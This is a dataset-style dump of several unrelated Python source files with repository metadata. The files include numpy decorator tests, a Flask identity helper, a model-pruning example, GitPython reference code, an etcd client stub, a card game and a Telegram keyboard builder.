        pass
    except SkipTest:
        raise Exception('Skipped when not expected to')
def test_skip_functions_callable():
    """skipif with a callable predicate evaluates it at call time, not at decoration."""
    def skip_tester():
        # Late-bound closure: reads skip_flag, which is (re)assigned below
        # *after* decoration, right before each decorated function is called.
        return skip_flag == 'skip me!'
    @dec.skipif(skip_tester)
    def f1(x):
        raise DidntSkipException
    try:
        skip_flag = 'skip me!'
        f1('a')
    except DidntSkipException:
        raise Exception('Failed to skip')
    except SkipTest:
        pass
    @dec.skipif(skip_tester)
    def f2(x):
        raise DidntSkipException
    try:
        skip_flag = 'five is right out!'
        f2('a')
    except DidntSkipException:
        pass
    except SkipTest:
        raise Exception('Skipped when not expected to')
def test_skip_generators_hardcoded():
    """knownfailureif on generator tests raises KnownFailureException when armed."""
    @dec.knownfailureif(True, "This test is known to fail")
    def g1(x):
        for i in range(x):
            yield i
    try:
        for j in g1(10):
            pass
    except KnownFailureException:
        pass
    else:
        raise Exception('Failed to mark as known failure')
    @dec.knownfailureif(False, "This test is NOT known to fail")
    def g2(x):
        for i in range(x):
            yield i
        # Raised only after the generator is exhausted, proving the body ran.
        raise DidntSkipException('FAIL')
    try:
        for j in g2(10):
            pass
    except KnownFailureException:
        raise Exception('Marked incorrectly as known failure')
    except DidntSkipException:
        pass
def test_skip_generators_callable():
    """knownfailureif with a callable predicate, evaluated when the test runs."""
    def skip_tester():
        # Late-bound closure over skip_flag, assigned below before each call.
        return skip_flag == 'skip me!'
    @dec.knownfailureif(skip_tester, "This test is known to fail")
    def g1(x):
        for i in range(x):
            yield i
    try:
        skip_flag = 'skip me!'
        for j in g1(10):
            pass
    except KnownFailureException:
        pass
    else:
        raise Exception('Failed to mark as known failure')
    @dec.knownfailureif(skip_tester, "This test is NOT known to fail")
    def g2(x):
        for i in range(x):
            yield i
        raise DidntSkipException('FAIL')
    try:
        skip_flag = 'do not skip'
        for j in g2(10):
            pass
    except KnownFailureException:
        raise Exception('Marked incorrectly as known failure')
    except DidntSkipException:
        pass
def test_deprecated():
    """dec.deprecated passes only if the wrapped callable emits DeprecationWarning."""
    @dec.deprecated(True)
    def non_deprecated_func():
        pass
    @dec.deprecated()
    def deprecated_func():
        import warnings
        warnings.warn("TEST: deprecated func", DeprecationWarning)
    @dec.deprecated()
    def deprecated_func2():
        import warnings
        warnings.warn("AHHHH")
        raise ValueError
    @dec.deprecated()
    def deprecated_func3():
        import warnings
        warnings.warn("AHHHH")
    # marked as deprecated, but does not raise DeprecationWarning
    assert_raises(AssertionError, non_deprecated_func)
    # should be silent
    deprecated_func()
    with warnings.catch_warnings(record=True):
        warnings.simplefilter("always")  # do not propagate unrelated warnings
        # fails if deprecated decorator just disables test. See #1453.
        assert_raises(ValueError, deprecated_func2)
        # warning is not a DeprecationWarning
        assert_raises(AssertionError, deprecated_func3)
if __name__ == '__main__':
    # Run all tests in this module via numpy's (nose-based) module suite runner.
    run_module_suite()
|
[
"lukaspolon@gmail.com"
] |
lukaspolon@gmail.com
|
430153ab989c70328c2d747dca69ee952a2d761e
|
03ae0dee75698f5012d80b218e71500181cd3e68
|
/cd2h_repo_project/utils.py
|
62197a6d92d58546d86f4a14193d1f23d3f6e3fb
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
galterlibrary/InvenioRDM-at-NU
|
0b5e5043f67d0dc12960c00617ad2b7e14f4f6e8
|
5aff6ac7c428c9a61bdf221627bfc05f2280d1a3
|
refs/heads/master
| 2020-03-20T14:45:50.950239
| 2019-09-26T19:14:45
| 2019-09-26T19:14:45
| 137,494,704
| 6
| 0
|
MIT
| 2019-09-26T19:14:47
| 2018-06-15T14:06:06
|
Python
|
UTF-8
|
Python
| false
| false
| 630
|
py
|
"""General utility functions for any module."""
from flask_principal import AnonymousIdentity, Identity, RoleNeed, UserNeed
def get_identity(user):
    """Returns the identity for a given user instance.

    Falls back to ``AnonymousIdentity`` when *user* has no ``id``
    attribute. This is needed because we are more explicit than
    Flask-Principal and it is MUCH more convenient for tests.
    """
    if not hasattr(user, 'id'):
        return AnonymousIdentity()
    identity = Identity(user.id)
    identity.provides.add(UserNeed(user.id))
    # Grant a RoleNeed for every role attached to the user, if any.
    for role in getattr(user, 'roles', []):
        identity.provides.add(RoleNeed(role.name))
    identity.user = user
    return identity
|
[
"fenekku@fenekku.com"
] |
fenekku@fenekku.com
|
457faf21e9fc6f3d361e17dc6880d7510c0822b5
|
2d0bada349646b801a69c542407279cc7bc25013
|
/src/vai_optimizer/example/pruning/tensorflow_v1/resnet50_pruning.py
|
3f6b05b1cd1911eaf0f109cd895db49dffccf932
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-3-Clause-Open-MPI",
"LicenseRef-scancode-free-unknown",
"Libtool-exception",
"GCC-exception-3.1",
"LicenseRef-scancode-mit-old-style",
"OFL-1.1",
"JSON",
"LGPL-2.1-only",
"LGPL-2.0-or-later",
"ICU",
"LicenseRef-scancode-other-permissive",
"GPL-2.0-or-later",
"GPL-3.0-only",
"LicenseRef-scancode-issl-2018",
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-unicode",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-3.0-or-later",
"Zlib",
"BSD-Source-Code",
"ClArtistic",
"LicenseRef-scancode-unknown-license-reference",
"ISC",
"NCSA",
"LicenseRef-scancode-proprietary-license",
"GPL-2.0-only",
"CC-BY-4.0",
"FSFULLR",
"Minpack",
"Unlicense",
"BSL-1.0",
"NAIST-2003",
"LicenseRef-scancode-protobuf",
"LicenseRef-scancode-public-domain",
"Libpng",
"Spencer-94",
"BSD-2-Clause",
"Intel",
"GPL-1.0-or-later",
"MPL-2.0"
] |
permissive
|
Xilinx/Vitis-AI
|
31e664f7adff0958bb7d149883ab9c231efb3541
|
f74ddc6ed086ba949b791626638717e21505dba2
|
refs/heads/master
| 2023-08-31T02:44:51.029166
| 2023-07-27T06:50:28
| 2023-07-27T06:50:28
| 215,649,623
| 1,283
| 683
|
Apache-2.0
| 2023-08-17T09:24:55
| 2019-10-16T21:41:54
|
Python
|
UTF-8
|
Python
| false
| false
| 2,145
|
py
|
# MIT License
#
# Copyright (c) 2023 Advanced Micro Devices, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from tf1_nndct.optimization.pruning import IterativePruningRunner
import tensorflow as tf
import numpy as np
from nets.resnet_v2 import resnet_v2_50
def eval_fn(frozen_graph_def: tf.compat.v1.GraphDef) -> float:
  """Stub evaluation callback handed to the pruner's sensitivity analysis.

  Always reports a fixed score of 0.5; a real implementation would execute
  the frozen graph against a validation set. NOTE(review): both the session
  and frozen_graph_def are currently unused.
  """
  with tf.compat.v1.Session().as_default() as sess:
    return 0.5
def main():
  """Build ResNet-50 v2, analyze pruning sensitivity, prune to 50% sparsity."""
  with tf.compat.v1.Session() as sess:
    opt = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.1)
    # Dummy all-ones input batch; resnet_v2_50 defines the graph to prune.
    images = tf.convert_to_tensor(np.ones((1, 224, 224, 3), dtype=np.float32))
    net, _ = resnet_v2_50(images, 1000)
    print(net)
    loss = tf.reduce_sum(net)
    sess.run(tf.global_variables_initializer())
    # The output node name tells the pruner where the graph ends.
    pruner = IterativePruningRunner("resnet50", sess, {}, ["resnet_v2_50/SpatialSqueeze"])
    # Sensitivity analysis across two GPUs using the stub eval_fn above.
    pruner.ana(eval_fn, gpu_ids=['/GPU:0', '/GPU:1'])
    shape_tensors, masks = pruner.prune(sparsity=0.5)
    variables = tf.trainable_variables()
    # One (dummy) fine-tuning step on the pruned graph.
    sess.run(opt.minimize(loss, var_list=variables))
    slim_graph_def = pruner.get_slim_graph_def(shape_tensors, masks)
# Script entry point.
if __name__ == "__main__":
  main()
|
[
"do-not-reply@gitenterprise.xilinx.com"
] |
do-not-reply@gitenterprise.xilinx.com
|
17329d67a9eef61295267530f6d4eed9da6ec6a4
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/api/datahub/access/tests/modules/collector/no_factory_test.py
|
7cb318fa5707ad99aaceecb1edeccc1dd7dd0110
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661
| 2022-04-02T10:30:55
| 2022-04-02T10:30:55
| 381,257,882
| 101
| 51
|
NOASSERTION
| 2022-04-02T10:30:56
| 2021-06-29T06:10:01
|
Python
|
UTF-8
|
Python
| false
| false
| 3,992
|
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import
import httpretty
import pytest
from datahub.access.collectors.base_collector import BaseAccessTask
from datahub.access.tests.fixture import conftest
from datahub.access.tests.fixture.access import * # noqa
from datahub.access.tests.utils import post
# Shared request payload for the deploy-plan/deploy API tests below; the
# data_scenario 'unknow' deliberately has no registered collector factory.
param = {
    "bk_app_code": "bk_dataweb",
    "bk_username": "admin",
    "data_scenario": "unknow",
    "bk_biz_id": 591,
    "description": "xx",
    "access_raw_data": {
        "raw_data_name": "log_new_00011",
        "maintainer": "xxxx",
        "raw_data_alias": "asdfsaf",
        "data_source": "svr",
        "data_encoding": "UTF-8",
        "sensitivity": "private",
        "description": "xx",
    },
    "access_conf_info": {
        "collection_model": {"collection_type": "incr", "start_at": 1, "period": 0},
        "filters": {
            "delimiter": "|",
            "fields": [{"index": 1, "op": "=", "logic_op": "and", "value": "111"}],
        },
        "resource": {
            "scope": [
                {
                    "module_scope": [{"bk_obj_id": "set", "bk_inst_id": 123}],
                    "host_scope": [{"bk_cloud_id": 1, "ip": "x.x.x.x"}],
                    "scope_config": {
                        "paths": [
                            {
                                "path": ["/tmp/*.log", "/tmp/*.l", "/tmp/*.aaaz"],
                                "system": "linux",
                            }
                        ]
                    },
                }
            ]
        },
    },
}
@pytest.mark.django_db
def test_error_factory_deploy_plan():
    """An unknown data_scenario must make the deploy-plan endpoint fail with code 1577209."""
    httpretty.enable()
    httpretty.reset()
    # Stub permissions and the upstream services the view talks to.
    conftest.mock_user_perm("admin")
    conftest.mock_app_perm("bk_dataweb")
    conftest.mock_create_data_id()
    conftest.mock_get_data_id("unknow")
    conftest.mock_collector_hub_deploy_plan()
    response = post("/v3/access/deploy_plan/", param)
    assert not response["result"]
    assert response["code"] == "1577209"
@pytest.mark.django_db
def test_error_factory_deploy():
    """Deploying a collector with an unknown scenario must fail with code 1577209."""
    httpretty.enable()
    httpretty.reset()
    conftest.mock_user_perm("admin")
    conftest.mock_app_perm("bk_dataweb")
    response = post("/v3/access/collector/unknow/deploy/", param)
    assert not response["result"]
    assert response["code"] == "1577209"
@pytest.mark.usefixtures("init_task_log")
@pytest.mark.django_db
def test_task_log():
    """Writing a debug entry through BaseAccessTask.log should not raise."""
    conftest.mock_user_perm("admin")
    conftest.mock_app_perm("bk_dataweb")
    access_task = BaseAccessTask(task_id=100)
    access_task.log("test debug", level="debug", task_log=False, time=None)
|
[
"terrencehan@tencent.com"
] |
terrencehan@tencent.com
|
ff370d8533a9be416e4441f7a342c23059b406b2
|
973713f993166b1d0c2063f6e84361f05803886d
|
/Day01-15/09_exercise_8.py
|
bcd5d38fd6e777cae500b75373d3bdd0c6b4c445
|
[
"MIT"
] |
permissive
|
MaoningGuan/Python-100-Days
|
20ad669bcc0876b5adfbf2c09b4d25fd4691061a
|
d36e49d67a134278455438348efc41ffb28b778a
|
refs/heads/master
| 2022-11-17T12:24:45.436100
| 2020-07-18T02:24:42
| 2020-07-18T02:24:42
| 275,157,107
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,995
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
扑克游戏
"""
import random
class Card(object):
    """A single playing card, defined by its suite symbol and face value (1-13)."""

    def __init__(self, suite, face):
        self._suite = suite
        self._face = face

    @property
    def face(self):
        return self._face

    @property
    def suite(self):
        return self._suite

    def __str__(self):
        # Aces and court cards print as letters, everything else as digits.
        letters = {1: 'A', 11: 'J', 12: 'Q', 13: 'K'}
        face_str = letters.get(self._face, str(self._face))
        return '%s%s' % (self._suite, face_str)

    def __repr__(self):
        return self.__str__()
class Poker(object):
    """A 52-card deck that can be shuffled and dealt one card at a time."""

    def __init__(self):
        # Build the deck suite by suite, face 1..13 each.
        deck = []
        for suite in '♠♥♣♦':
            for face in range(1, 14):
                deck.append(Card(suite, face))
        self._cards = deck
        self._current = 0

    @property
    def cards(self):
        return self._cards

    def shuffle(self):
        """Shuffle the deck in place and restart dealing from the top."""
        self._current = 0
        random.shuffle(self._cards)

    @property
    def next(self):
        """Deal (and consume) the next card of the deck."""
        dealt = self._cards[self._current]
        self._current += 1
        return dealt

    @property
    def has_next(self):
        """Whether any undealt cards remain."""
        return self._current < len(self._cards)
class Player(object):
    """A participant in the card game: a name plus the hand of dealt cards."""

    def __init__(self, name):
        self._name = name
        self._hand = []

    @property
    def name(self):
        return self._name

    @property
    def cards_on_hand(self):
        return self._hand

    def get(self, card):
        """Accept one dealt card into the hand."""
        self._hand.append(card)

    def arrange(self, card_key):
        """Sort the hand in place using *card_key* as the sort key."""
        self._hand.sort(key=card_key)
def get_key(card):
    """Sort key for cards: group by suite first, then order by face value."""
    return card.suite, card.face
def _hand_value(cards):
    """Return the best 21-point ("blackjack") value of a hand of cards.

    Court cards (J/Q/K) count as 10.  An ace counts as 11 whenever that does
    not push the total over 21, otherwise as 1 (two aces therefore score 12).

    :param cards: iterable of Card objects (each with a ``face`` in 1..13)
    :return: the hand's best point total as an int
    """
    # Base total: aces as 1, court cards capped at 10.
    total = sum(min(card.face, 10) for card in cards)
    # Upgrade one ace from 1 to 11 when it does not bust the hand.
    if any(card.face == 1 for card in cards) and total + 10 <= 21:
        total += 10
    return total


def main():
    """Deal two cards to each of four players and announce the 21-point winner."""
    poker = Poker()
    poker.shuffle()
    players = [Player('东邪'), Player('西毒'), Player('南帝'), Player('北丐')]
    game_name = '21点'
    cards_per_player = 2
    # Deal round-robin so every player receives cards_per_player cards.
    for _ in range(cards_per_player):
        for player in players:
            player.get(poker.next)
    print(game_name + ':')
    scores = []
    for player in players:
        print(player.name + ':', end=' ')
        player.arrange(get_key)
        print(player.cards_on_hand)
        scores.append(_hand_value(player.cards_on_hand))
    print(scores)
    # Winner: first player with the highest score that does not exceed 21.
    best_score = 0
    winner = None
    for index, score in enumerate(scores):
        if best_score < score <= 21:
            best_score = score
            winner = players[index]
    if best_score != 0:
        print(f'赢家为{winner.name},点数为{best_score}')
|
[
"1812711281@qq.com"
] |
1812711281@qq.com
|
a60c7006ec0c959e30a9e86876873f261277a809
|
aa6e1dd07a71a73bc08574b76f9e57a3ce8c8286
|
/077.Test_BeeWare_windows/beeware-tutorial/beeware-venv/Lib/site-packages/git/refs/reference.py
|
aaa9b63fe7fa10fe82bb3632e3410b491b042f8e
|
[
"MIT"
] |
permissive
|
IvanaXu/PyTools
|
0aff5982f50bb300bfa950405192c78473b69537
|
358ae06eef418fde35f424909d4f13049ca9ec7b
|
refs/heads/master
| 2023-06-07T21:45:44.242363
| 2023-06-06T16:00:25
| 2023-06-06T16:00:25
| 163,940,845
| 60
| 8
|
MIT
| 2022-12-23T02:49:05
| 2019-01-03T07:54:16
|
Python
|
UTF-8
|
Python
| false
| false
| 4,408
|
py
|
import functools

from git.util import (
    LazyMixin,
    Iterable,
)

from .symbolic import SymbolicReference
__all__ = ["Reference"]
#{ Utilities
def require_remote_ref_path(func):
    """Decorator raising a ValueError if we are not a valid remote, based on the path.

    Note: the original docstring claimed TypeError, but the code raises
    ValueError; the documentation now matches the behavior.

    :param func: method taking the reference instance as its first argument
    :raise ValueError: if ``self.path`` does not denote a remote reference"""
    @functools.wraps(func)  # preserve __name__, __doc__, __module__, etc.
    def wrapper(self, *args, **kwargs):
        if not self.is_remote():
            raise ValueError("ref path does not point to a remote reference: %s" % self.path)
        return func(self, *args, **kwargs)
    # END wrapper
    return wrapper
#}END utilities
class Reference(SymbolicReference, LazyMixin, Iterable):
    """Represents a named reference to any object. Subclasses may apply restrictions though,
    i.e. Heads can only point to commits."""
    __slots__ = ()
    # Subclass knobs: whether the ref may only target commits, whether to
    # resolve the ref when creating it, and the path prefix all instances share.
    _points_to_commits_only = False
    _resolve_ref_on_create = True
    _common_path_default = "refs"

    def __init__(self, repo, path, check_path=True):
        """Initialize this instance

        :param repo: Our parent repository
        :param path:
            Path relative to the .git/ directory pointing to the ref in question, i.e.
            refs/heads/master
        :param check_path: if False, you can provide any path. Otherwise the path must start with the
            default path prefix of this type."""
        if check_path and not path.startswith(self._common_path_default + '/'):
            raise ValueError("Cannot instantiate %r from path %s" % (self.__class__.__name__, path))
        super(Reference, self).__init__(repo, path)

    def __str__(self):
        return self.name

    #{ Interface

    def set_object(self, object, logmsg=None):  # @ReservedAssignment
        """Special version which checks if the head-log needs an update as well

        :return: self"""
        # Remember the old commit sha only when HEAD points at us and a log
        # message is supplied, so the HEAD reflog can be appended afterwards.
        oldbinsha = None
        if logmsg is not None:
            head = self.repo.head
            if not head.is_detached and head.ref == self:
                oldbinsha = self.commit.binsha
            # END handle commit retrieval
        # END handle message is set
        super(Reference, self).set_object(object, logmsg)
        if oldbinsha is not None:
            # /* from refs.c in git-source
            # * Special hack: If a branch is updated directly and HEAD
            # * points to it (may happen on the remote side of a push
            # * for example) then logically the HEAD reflog should be
            # * updated too.
            # * A generic solution implies reverse symref information,
            # * but finding all symrefs pointing to the given branch
            # * would be rather costly for this rare event (the direct
            # * update of a branch) to be worth it. So let's cheat and
            # * check with HEAD only which should cover 99% of all usage
            # * scenarios (even 100% of the default ones).
            # */
            self.repo.head.log_append(oldbinsha, logmsg)
        # END check if the head
        return self

    # NOTE: No need to overwrite properties, as they will only work without the log

    @property
    def name(self):
        """:return: (shortest) Name of this reference - it may contain path components"""
        # first two path tokens can be removed as they are
        # refs/heads or refs/tags or refs/remotes
        tokens = self.path.split('/')
        if len(tokens) < 3:
            return self.path  # could be refs/HEAD
        return '/'.join(tokens[2:])

    @classmethod
    def iter_items(cls, repo, common_path=None):
        """Equivalent to SymbolicReference.iter_items, but will return non-detached
        references as well."""
        return cls._iter_items(repo, common_path)

    #}END interface

    #{ Remote Interface

    @property
    @require_remote_ref_path
    def remote_name(self):
        """
        :return:
            Name of the remote we are a reference of, such as 'origin' for a reference
            named 'origin/master'"""
        tokens = self.path.split('/')
        # /refs/remotes/<remote name>/<branch_name>
        return tokens[2]

    @property
    @require_remote_ref_path
    def remote_head(self):
        """:return: Name of the remote head itself, i.e. master.

        :note: The returned name is usually not qualified enough to uniquely identify
            a branch"""
        tokens = self.path.split('/')
        return '/'.join(tokens[3:])

    #} END remote interface
|
[
"1440420407@qq.com"
] |
1440420407@qq.com
|
bce5d26895cbbaa98ad04b69f939816ec032ddc7
|
7feebb0a6c7751ad2b1870efd63c85c2d8f670bb
|
/txaioetcd/_client_aio.py
|
6de2f28359bb6d9ba8c403a216e4fef45e309398
|
[
"MIT"
] |
permissive
|
om26er/txaio-etcd
|
edbcfe65ac19c8f4326944f0b0bcae986e7aa3fe
|
0ed71ba01ab13acebf874ddf650f880bb1e676a5
|
refs/heads/master
| 2021-01-02T23:36:01.330887
| 2017-09-14T18:28:21
| 2017-09-14T18:28:21
| 99,502,890
| 0
| 0
| null | 2017-08-06T17:36:17
| 2017-08-06T17:36:17
| null |
UTF-8
|
Python
| false
| false
| 2,579
|
py
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
__all__ = (
'Client',
)
# NOTE(review): appears unused within this module — presumably a sentinel
# type to distinguish "argument not given" from an explicit ``None``; confirm
# against the twisted flavor of this client before removing.
class _None(object):
    pass
class Client(object):
    """
    etcd asyncio client that talks to the gRPC HTTP gateway endpoint of etcd v3.

    See: https://coreos.com/etcd/docs/latest/dev-guide/apispec/swagger/rpc.swagger.json

    NOTE: every operation below is currently a stub that raises
    ``Exception('not implemented')``; only the interface is defined here.
    """

    def __init__(self, loop, url):
        # loop: presumably the asyncio event loop to run on — TODO confirm
        # url: etcd gRPC HTTP gateway endpoint
        pass

    def status(self):
        """Stub: not implemented in the asyncio flavor yet."""
        raise Exception('not implemented')

    def set(self, key, value, lease=None, return_previous=None):
        """Stub: not implemented in the asyncio flavor yet."""
        raise Exception('not implemented')

    def get(self,
            key,
            count_only=None,
            keys_only=None,
            limit=None,
            max_create_revision=None,
            min_create_revision=None,
            min_mod_revision=None,
            revision=None,
            serializable=None,
            sort_order=None,
            sort_target=None):
        """Stub: not implemented in the asyncio flavor yet."""
        raise Exception('not implemented')

    def delete(self, key, return_previous=None):
        """Stub: not implemented in the asyncio flavor yet."""
        raise Exception('not implemented')

    def watch(self, keys, on_watch, start_revision=None):
        """Stub: not implemented in the asyncio flavor yet."""
        raise Exception('not implemented')

    def submit(self, txn):
        """Stub: not implemented in the asyncio flavor yet."""
        raise Exception('not implemented')

    def lease(self, time_to_live, lease_id=None):
        """Stub: not implemented in the asyncio flavor yet."""
        raise Exception('not implemented')
|
[
"tobias.oberstein@tavendo.de"
] |
tobias.oberstein@tavendo.de
|
20803dc548bd9f4077e54216bfe95ec8e10adf13
|
d94b6845aeeb412aac6850b70e22628bc84d1d6d
|
/gfsa/training/simple_train.py
|
d352630a277e5c92d7087e72fc751cf46dc4ca7d
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
ishine/google-research
|
541aea114a68ced68736340e037fc0f8257d1ea2
|
c1ae273841592fce4c993bf35cdd0a6424e73da4
|
refs/heads/master
| 2023-06-08T23:02:25.502203
| 2023-05-31T01:00:56
| 2023-05-31T01:06:45
| 242,478,569
| 0
| 0
|
Apache-2.0
| 2020-06-23T01:55:11
| 2020-02-23T07:59:42
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,569
|
py
|
# coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple training runner."""
from absl import app
from absl import flags
import gin
from gfsa.training import simple_runner
# Output locations for logs and saved artifacts.
flags.DEFINE_string("train_log_dir", None, "Path to log directory.")
flags.DEFINE_string("train_artifacts_dir", None,
                    "Path to save params and other artifacts.")
# Gin configuration sources: config files, include search dirs, and overrides.
flags.DEFINE_multi_string("gin_files", [], "Gin config files to use.")
flags.DEFINE_multi_string("gin_include_dirs", [],
                          "Directories to search when resolving gin includes.")
flags.DEFINE_multi_string(
    "gin_bindings", [],
    "Gin bindings to override the values set in the config files.")
flags.DEFINE_enum("task", None, {"maze", "edge_supervision", "var_misuse"},
                  "Task to run.")

FLAGS = flags.FLAGS
def main(argv):
    """Entry point: pick the task's train function, configure Gin, and train.

    :param argv: leftover positional command-line args; only the program
        name is expected.
    :raises app.UsageError: if extra positional arguments were passed.
    :raises ValueError: if --task is not one of the supported tasks.
    """
    if len(argv) > 1:
        raise app.UsageError("Too many command-line arguments.")

    # Import only the selected task's training module, so the other tasks'
    # dependencies are never loaded (hence the imports inside the branches).
    # pylint:disable=g-import-not-at-top
    if FLAGS.task == "maze":
        from gfsa.training import train_maze_lib
        train_fn = train_maze_lib.train
    elif FLAGS.task == "edge_supervision":
        from gfsa.training import train_edge_supervision_lib
        train_fn = train_edge_supervision_lib.train
    elif FLAGS.task == "var_misuse":
        from gfsa.training import train_var_misuse_lib
        train_fn = train_var_misuse_lib.train
    else:
        raise ValueError(f"Unrecognized task {FLAGS.task}")
    # pylint:enable=g-import-not-at-top

    print("Setting up Gin configuration")

    for include_dir in FLAGS.gin_include_dirs:
        gin.add_config_file_search_path(include_dir)

    # Bind the output locations from flags first, then parse the config
    # files/overrides without finalizing, and finalize once everything
    # has been applied.
    gin.bind_parameter("simple_runner.training_loop.artifacts_dir",
                       FLAGS.train_artifacts_dir)
    gin.bind_parameter("simple_runner.training_loop.log_dir", FLAGS.train_log_dir)
    gin.parse_config_files_and_bindings(
        FLAGS.gin_files,
        FLAGS.gin_bindings,
        finalize_config=False,
        skip_unknown=False)
    gin.finalize()

    train_fn(runner=simple_runner)
if __name__ == "__main__":
app.run(main)
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
f86f0b7160e46973c357dad4d8d75a61687f58b3
|
ff413ecba8eb6a3f8afc225bd1339abac453202c
|
/project/admin_bot/keyboards/adding_products_to_package_kb.py
|
fb360b13d90fd94339878386bb1388ab12bda04c
|
[] |
no_license
|
Artvell/bot
|
561b614fde5d19335736ac390e35814afd6b6180
|
0b85a5efc4c302f522bf23a23fbbbc8a9efc7008
|
refs/heads/main
| 2023-08-10T17:10:21.500433
| 2021-09-11T12:54:32
| 2021-09-11T12:54:32
| 405,372,665
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 372
|
py
|
from aiogram.types import InlineKeyboardButton, InlineKeyboardMarkup
def adding_kb(package_id):
    """Build the inline keyboard shown while adding products to a package."""
    markup = InlineKeyboardMarkup()
    add_button = InlineKeyboardButton(
        "Добавить", switch_inline_query_current_chat=""
    )
    finish_button = InlineKeyboardButton(
        "Закончить добавление", callback_data=f"end_adding_{package_id}"
    )
    markup.add(add_button)
    markup.add(finish_button)
    return markup
|
[
"artem.karimov.98@gmail.com"
] |
artem.karimov.98@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.